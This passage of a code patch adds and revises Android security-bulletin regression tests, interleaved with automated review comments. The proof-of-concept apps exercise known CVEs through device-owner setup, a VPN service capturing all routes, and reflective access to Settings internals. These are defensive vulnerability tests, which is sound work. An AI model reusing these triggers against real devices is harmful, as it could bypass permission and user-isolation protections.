+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class TestLocationScanningServicesUsingSlices extends NonRootSecurityTestCase {
+ private final String mTestPkg = "android.security.cts.TestLocationScanningServicesUsingSlices";
+ private final String mTestClass = mTestPkg + "." + "DeviceTest";
+ private ITestDevice mDevice = null;
+
+ @Before
+ public void setUp() {
+ try {
+ mDevice = getDevice();
+
+ // Install test app
+ installPackage("TestLocationScanningServicesUsingSlices.apk", "-t");
+
+ // Set test app as device owner
+ assumeTrue(
+ mDevice.setDeviceOwner(
+ mTestPkg + "/.PocDeviceAdminReceiver", mDevice.getCurrentUser()));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @After
+ public void tearDown() {
+ try {
+ mDevice.removeAdmin(mTestPkg + "/.PocDeviceAdminReceiver", mDevice.getCurrentUser());
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", mDevice);
+ } catch (Exception ignored) {
+ // ignore all exceptions
+ }
+ }
+
+ // b/277333781
+ // Vulnerable module : com.android.settings
+ // Vulnerable apk : Settings.apk
+ @AsbSecurityTest(cveBugId = 277333781)
+ @Test
+ public void testPocCVE_2023_21247() {
+ try (AutoCloseable withBluetoothDisabled =
+ withSetting(mDevice, "global", "ble_scan_always_enabled", "0")) {
+ runDeviceTests(mTestPkg, mTestClass, "testPocCVE_2023_21247");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ // b/277333746
+ // Vulnerable module : com.android.settings
+ // Vulnerable apk : Settings.apk
+ @AsbSecurityTest(cveBugId = 277333746)
+ @Test
+ public void testPocCVE_2023_21248() {
+ try (AutoCloseable withWifiDisabled =
+ withSetting(mDevice, "global", "wifi_scan_always_enabled", "0")) {
+ runDeviceTests(mTestPkg, mTestClass, "testPocCVE_2023_21248");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
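Review bot: `tearDown()` discards the result of `mDevice.removeAdmin(...)` and swallows every exception, so if the removal fails the PoC app installed with `-t` stays device owner for the rest of the run and nothing in the log says so. A throw from `removeAdmin` also skips the HOME key event on the next line. Check the return value and log the failure, e.g. `if (!mDevice.removeAdmin(admin, mDevice.getCurrentUser())) { CLog.w("Could not remove device owner %s", admin); }`, using tradefed's `CLog` (needs an import), and send the key event from its own try block. `mTestPkg` and `mTestClass` never change and would read better as `private static final` constants.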
diff --git a/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java b/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
index 28041b1..169822d 100644
--- a/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
+++ b/hostsidetests/securitybulletin/test-apps/BUG-261036568/content-provider/src/android/security/cts/BUG_261036568_provider/ImageProvider.java
@@ -69,6 +69,17 @@
}
}
+ /**
+ * Computes an appId from uid
+ *
+ * @param uid The uid of the app
+ * @return The app id of the app
+ * @see android.os.UserHandle#getAppId
+ */
+ private static int getAppId(int uid) {
+ return uid % 100000;
+ }
+
@Override
public boolean onCreate() {
mChooserUid = getChooserUid(getContext());
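Review bot: `getAppId` hard-codes `100000` with no name. The Javadoc points at `UserHandle#getAppId`, and the literal is the per-user uid range that the platform method uses, so a named constant with a short comment would make that dependency explicit: `private static final int PER_USER_RANGE = 100000; // mirrors UserHandle.PER_USER_RANGE`. The Javadoc could also say that the result is the uid with the user part stripped, since that is what the cross-user check later in the file relies on.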
@@ -145,7 +156,7 @@
UserHandle caller = getCallingUserHandle();
if (!myUserHandle().equals(caller)) {
int callingUid = getCallingUid();
- if (callingUid != mChooserUid) {
+ if (getAppId(callingUid) != getAppId(mChooserUid)) {
Log.w(TAG, "Ignoring cross-user access by package " + getCallingPackage()
+ " (uid=" + callingUid + ")");
return;
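Review bot: The cross-user check now compares appIds instead of full uids, which deliberately widens it: the chooser running under any user or profile is accepted, not only the instance whose uid was captured in `onCreate()`. That is a security-relevant relaxation and deserves a comment on the `if`, e.g. `// Compare appIds, not uids: the chooser may run in a different user/profile than this provider.` The enclosing method starts and ends outside this hunk, so whether other checks bound the caller cannot be confirmed from here.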
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
index faf549e..b0493f1 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/res/values/strings.xml
@@ -16,6 +16,7 @@
-->
<resources>
+ <string name="deviceLockFailMessage">Device is not Locked!</string>
<string name="helperAppPackage">android.security.cts.CVE_2021_0595_helper</string>
<string name="launchSecondPocActivityAction">launchSecondPocActivity</string>
<string name="testFailMessage">Vulnerable to b/177457096</string>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
index 431d445..b3784f5 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0595/test-app/src/android/security/cts/CVE_2021_0595_test/DeviceTest.java
@@ -19,10 +19,11 @@
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
import static org.junit.Assert.assertFalse;
-import static org.junit.Assume.assumeTrue;
import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
import android.app.Instrumentation;
+import android.app.KeyguardManager;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Context;
@@ -72,6 +73,9 @@
// Swipe/Remove Lock Screen
device.pressMenu();
+ assumeTrue(
+ context.getString(R.string.deviceLockFailMessage),
+ context.getSystemService(KeyguardManager.class).isDeviceLocked());
assertFalse(
context.getString(R.string.testFailMessage),
context.getString(R.string.helperAppPackage)
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp
new file mode 100644
index 0000000..1a8fd19
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-39622",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml
new file mode 100644
index 0000000..5ee0e4b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/AndroidManifest.xml
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2021_39622">
+ <application>
+ <service
+ android:name=".PocService"
+ android:exported="true"
+ android:permission="android.permission.BIND_VPN_SERVICE">
+ <intent-filter>
+ <action android:name="android.net.VpnService" />
+ </intent-filter>
+ </service>
+ <activity android:name=".PocActivity"
+ android:windowSoftInputMode="stateVisible"
+ android:exported="true" />
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_39622" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml
new file mode 100644
index 0000000..103a118
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/res/values/strings.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<resources>
+ <string name="gboardPkgName">com.google.android.inputmethod.latin</string>
+ <string name="ipv4Address">192.0.0.0</string>
+ <string name="micIconResId">key_pos_header_voice</string>
+ <string name="okButtonText">ok</string>
+ <string name="port">0.0.0.0</string>
+ <string name="runnable">CVE_2021_39622_vpnServiceRunnable</string>
+ <string name="vpnSessionName">CVE_2021_39622_vpnService</string>
+ <string name="vulnerableViewText">.*Gboard needs microphone access to enable voice typing.*
+ </string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java
new file mode 100644
index 0000000..4ffc6d4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/DeviceTest.java
@@ -0,0 +1,106 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.content.Context;
+import android.content.Intent;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private static final int TIMEOUT_MS = 5000;
+ private UiDevice mUiDevice;
+
+ public void checkVulnerability(BySelector micIcon, BySelector vulText) {
+ try {
+ // Click microphone icon to expose the vulnerable toast
+ mUiDevice.wait(Until.hasObject(micIcon), TIMEOUT_MS);
+ mUiDevice.findObject(micIcon).click();
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+
+ assertFalse(mUiDevice.wait(Until.hasObject(vulText), TIMEOUT_MS));
+ }
+
+ @Test
+ public void testPocCVE_2021_39622() {
+ try {
+ Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+ mUiDevice = UiDevice.getInstance(instrumentation);
+ Context context = instrumentation.getTargetContext();
+
+ // Show Gboard and prepare VpnService
+ context.startActivity(
+ new Intent(context, PocActivity.class).setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // OK button is used to allow vpn connection request
+ BySelector okButton =
+ By.text(
+ Pattern.compile(
+ context.getString(R.string.okButtonText),
+ Pattern.CASE_INSENSITIVE));
+
+ BySelector micIcon =
+ By.res(
+ context.getString(R.string.gboardPkgName),
+ context.getString(R.string.micIconResId));
+
+ BySelector vulText =
+ By.text(
+ Pattern.compile(
+ context.getString(R.string.vulnerableViewText),
+ Pattern.CASE_INSENSITIVE));
+
+ mUiDevice.wait(Until.hasObject(okButton), TIMEOUT_MS);
+ mUiDevice.findObject(okButton).click();
+
+ // In case permission was already denied using permission dialog box earlier, the
+ // permission dialog box does not appear and the mic icon of gboard appears
+ // unhighlighted indicating that mic permission is denied. Upon clicking the
+ // unhighlighted mic icon, vulnerable toast is visible.
+ checkVulnerability(micIcon, vulText);
+
+ // In case permission was not denied using permission dialog box earlier, the permission
+ // dialog box appears and pressing back turns the mic icon unhighlighted.
+ mUiDevice.pressBack();
+
+ // Check vulnerability after the mic icon is unhighlighted
+ checkVulnerability(micIcon, vulText);
+
+ // With fix the allow mic permission dialog box remains on screen
+ mUiDevice.pressHome();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
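Review bot: `checkVulnerability()` swallows every exception from the mic-icon lookup and click, so on a device where Gboard is not the active keyboard `findObject(micIcon)` returns null, the click never happens, and the following `assertFalse` passes without the vulnerable path being exercised. A security test that passes without running gives a false "not vulnerable" result. Put the precondition in an assumption before the first call, e.g. `assumeTrue("Gboard mic icon not found", mUiDevice.wait(Until.hasObject(micIcon), TIMEOUT_MS));` (needs `import static org.junit.Assume.assumeTrue;`). The catch inside `checkVulnerability()` may still be wanted for the second call, where the comments say the permission dialog can remain on screen.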
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java
new file mode 100644
index 0000000..a7e088b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocActivity.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.VpnService;
+import android.os.Bundle;
+import android.widget.EditText;
+
+public class PocActivity extends Activity {
+ private static final int REQUEST_CODE = 0;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+ EditText editText = new EditText(this);
+ setContentView(editText);
+ editText.requestFocus();
+
+ // Prepare VpnService
+ Intent intent = VpnService.prepare(this);
+ startActivityForResult(intent, REQUEST_CODE);
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ }
+
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ try {
+ if (requestCode == REQUEST_CODE && resultCode == RESULT_OK) {
+ // Start VpnService
+ startService(new Intent(this, PocService.class));
+ }
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ }
+}
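Review bot: `VpnService.prepare(this)` returns null when the app is already prepared, and `onCreate()` passes that result straight to `startActivityForResult`. On that path the call throws, the empty catch hides it, and `PocService` is never started. Handle the null case before the `startActivityForResult` call, e.g. `if (intent == null) { onActivityResult(REQUEST_CODE, RESULT_OK, null); return; }`. `onActivityResult` is also missing `@Override`, and the two empty `catch (Exception e)` blocks would be easier to diagnose with a log line each.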
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java
new file mode 100644
index 0000000..2863ea3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39622/src/android/security/cts/CVE_2021_39622/PocService.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import android.content.Intent;
+import android.net.VpnService;
+import android.os.ParcelFileDescriptor;
+
+public class PocService extends VpnService {
+ private ParcelFileDescriptor mInterface;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ try {
+ mInterface =
+ new Builder()
+ .setSession(getString(R.string.vpnSessionName))
+ .addAddress(getString(R.string.ipv4Address), 24)
+ .addRoute(getString(R.string.port), 0)
+ .establish();
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ return START_STICKY;
+ }
+
+ @Override
+ public void onDestroy() {
+ try {
+ if (mInterface != null) {
+ mInterface.close();
+ mInterface = null;
+ }
+ super.onDestroy();
+ stopSelf();
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ }
+}
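Review bot: `onStartCommand()` establishes a tunnel with a `0.0.0.0/0` route and returns `START_STICKY`, and nothing in the hunks visible here stops the service. Unless the host-side test removes the app, the device may be left with all traffic routed into an interface that nobody reads. Returning `START_NOT_STICKY` and stopping the service at the end of the device test would make cleanup independent of uninstall. In `onDestroy()`, `mInterface.close()` can throw before `super.onDestroy()` runs, so move `super.onDestroy()` into a `finally` and drop the `stopSelf()` after it. The string resource passed to `addRoute` is named `port` in strings.xml although it holds a route address; `routeAddress` would match its use.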
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml
deleted file mode 100644
index af45847..0000000
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml
+++ /dev/null
@@ -1,24 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- Copyright (C) 2022 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-<resources>
- <string name="defaultSettingsPkg">com.android.settings</string>
- <string name="getAvailabilityStatusMethodName">getAvailabilityStatus</string>
- <string name="privateDnsPreferenceControllerClassName">.network.PrivateDnsPreferenceController
- </string>
- <string name="testFailMsg">Device is vulnerable to b/206987762!! Private DNS can be modified in
- guest mode</string>
-</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
index 96cb205..731c594 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -17,10 +17,12 @@
package android.security.cts.CVE_2022_20112;
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
import static org.junit.Assert.assertFalse;
import static org.junit.Assume.assumeNoException;
import static org.junit.Assume.assumeTrue;
+import android.app.Instrumentation;
import android.app.UiAutomation;
import android.content.ComponentName;
import android.content.Context;
@@ -40,51 +42,64 @@
public class DeviceTest {
@Test
- public void testprivateDnsPreferenceController() {
- UiAutomation uiAutomation = null;
+ public void testPrivateDnsPreferenceController() {
try {
- Context context = getInstrumentation().getTargetContext();
+ final Instrumentation instrumentation = getInstrumentation();
+ final Context context = instrumentation.getContext();
// Retrieve settings package name dynamically
Intent settingsIntent = new Intent(Settings.ACTION_SETTINGS);
ComponentName settingsComponent =
settingsIntent.resolveActivity(context.getPackageManager());
- String settingsPkgName = settingsComponent != null ? settingsComponent.getPackageName()
- : context.getString(R.string.defaultSettingsPkg);
+ String settingsPkgName =
+ settingsComponent != null
+ ? settingsComponent.getPackageName()
+ : "com.android.settings";
// Get vulnerable method 'getAvailabilityStatus' using reflection
- Context settingsContext = context.createPackageContext(settingsPkgName,
- Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);
+ final Context settingsContext =
+ context.createPackageContext(
+ settingsPkgName,
+ Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);
ClassLoader settingsClassLoader = settingsContext.getClassLoader();
Class<?> privateDnsPreferenceControllerClass =
- settingsClassLoader.loadClass(settingsPkgName
- + context.getString(R.string.privateDnsPreferenceControllerClassName));
+ settingsClassLoader.loadClass(
+ settingsPkgName + ".network.PrivateDnsPreferenceController");
Constructor<?> privateDnsPreferenceControllerCstr =
privateDnsPreferenceControllerClass.getConstructor(Context.class);
Object privateDnsPreferenceControllerObject =
privateDnsPreferenceControllerCstr.newInstance(settingsContext);
- Method getAvailabilityStatusMethod = privateDnsPreferenceControllerClass
- .getDeclaredMethod(context.getString(R.string.getAvailabilityStatusMethodName));
+ Method getAvailabilityStatusMethod =
+ privateDnsPreferenceControllerClass.getDeclaredMethod("getAvailabilityStatus");
getAvailabilityStatusMethod.setAccessible(true);
// Check if current user is guest user
- uiAutomation = getInstrumentation().getUiAutomation();
- uiAutomation.adoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS);
final UserManager userManager = context.getSystemService(UserManager.class);
- assumeTrue(userManager.isGuestUser());
-
- // Invoke vulnerable method 'getAvailabilityStatus'
- int status =
- (int) getAvailabilityStatusMethod.invoke(privateDnsPreferenceControllerObject);
- assertFalse(context.getString(R.string.testFailMsg), status == 0 /* AVAILABLE */);
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ instrumentation, android.Manifest.permission.CREATE_USERS)) {
+ assumeTrue(userManager.isGuestUser());
+ // Invoke vulnerable method 'getAvailabilityStatus'
+ int status =
+ (int)
+ getAvailabilityStatusMethod.invoke(
+ privateDnsPreferenceControllerObject);
+ assertFalse(
+ "Device is vulnerable to b/206987762!! Private DNS can be modified in"
+ + " guest mode",
+ status == 0 /* AVAILABLE */);
+ }
} catch (Exception e) {
assumeNoException(e);
- } finally {
- try {
- uiAutomation.dropShellPermissionIdentity();
- } catch (Exception ignored) {
- // Ignore exception here
- }
}
}
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ Instrumentation instrumentation, String permission) {
+ final UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
}
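Review bot: An exception thrown by `dropShellPermissionIdentity()` during close() in `testPrivateDnsPreferenceController` is no longer swallowed as it was in the removed `finally`. It now reaches `catch (Exception e)` and becomes an assumption failure, so a run that would otherwise pass is reported as skipped. If that is intended, say so in a comment on the helper; otherwise have the returned lambda catch and ignore the failure. The try-with-resources variable also reuses the helper's name `withAdoptShellPermissionIdentity`; something like `shellPermission` reads more clearly. The helper would benefit from a doc comment in place of `// Remove permissions`, e.g. `/** Adopts the shell identity limited to {@code permission}; close() drops it again. */`.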
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp
new file mode 100644
index 0000000..89c9df9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp
@@ -0,0 +1,58 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-20944-target",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "target-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "target-app/AndroidManifest.xml",
+ sdk_version: "current",
+}
+
+android_test_helper_app {
+ name: "CVE-2023-20944-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ resource_dirs: [
+ "res",
+ "test-app/res",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml
new file mode 100644
index 0000000..17f8d12
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="accountType">android.security.cts.CVE_2023_20944_test.account</string>
+ <string name="actionTarget">actionTarget</string>
+ <string name="activityName">android.accounts.ChooseTypeAndAccountActivity</string>
+ <string name="activityTarget">android.security.cts.CVE_2023_20944_target.TargetActivity</string>
+ <string name="allowableAccountTypes">allowableAccountTypes</string>
+ <string name="bcastActionTarget">CVE_2023_20944_TargetActivity</string>
+ <string name="launchTaskId">android.activity.launchTaskId</string>
+ <string name="msgFail">Device is vulnerable to b/244154558 !!</string>
+ <string name="noExceptionMsg">no exception</string>
+ <string name="pkgName">android</string>
+ <string name="pkgTarget">android.security.cts.CVE_2023_20944_target</string>
+ <string name="pocCrashedMsg">PocActivity crashed with exception: %s</string>
+ <string name="pocFailedMsg">pocActivity failed</string>
+ <string name="spannableString">AAAAAAAAAAAA\n</string>
+ <string name="status">status</string>
+ <string name="targetFailMsg">TargetActivity did not launch successfully</string>
+ <string name="taskId">taskId</string>
+ <string name="taskOverlay">android.activity.taskOverlay</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml
new file mode 100644
index 0000000..dc41a97
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_20944_target">
+ <application>
+ <activity android:name=".TargetActivity"
